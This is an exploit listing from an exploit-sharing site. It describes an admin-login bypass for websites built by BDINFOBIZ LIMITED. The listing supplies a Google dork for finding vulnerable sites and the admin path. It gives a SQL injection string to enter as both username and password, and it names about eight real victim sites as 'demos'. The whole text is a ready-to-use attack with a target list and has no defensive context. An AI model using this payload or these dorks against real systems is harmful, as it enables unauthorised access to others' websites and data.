BDINFOBIZ LIMITED Bypass Admin Page Vulnerability

2015-07-31T00:00:00
ID 1337DAY-ID-23945
Type zdt
Reporter Ashiyane
Modified 2015-07-31T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Title : BDINFOBIZ LIMITED Bypass Admin Page Vulnerability
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://www.bdinfobiz.com/
[+] Date: 2015-07-29
[+] Google Dork : intext:"Developed by BDINFOBIZ LIMITED"
[+] Date:
[+] Tested On : Windows , Linux
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] And then choose a target and put this after url : /administration/index.php
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] And fill username and password like the information below :
[+] Username : '=' 'OR'
[+] Password : '=' 'OR'
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Demos :
[+] http://skXynews71.com/administration/index.php
[+] http://kheXlagharpata.com/administration/index.php
[+] http://unicaXmbd.com/administration/index.php
[+] http://hi-speXedbd.com/administration/index.php
[+] http://rifadeebXtexbd.com/administration/index.php
[+] http://fgnXbd.com/administration/index.php
[+] http://ghatXakdadu.com/administration/index.php
[+] http://sweetXtouchshop.com/administration/index.php
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] SPT : All of the friends in my heart <3
[+] Discovered by : Cloner-47
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

#  0day.today [2018-01-03]  #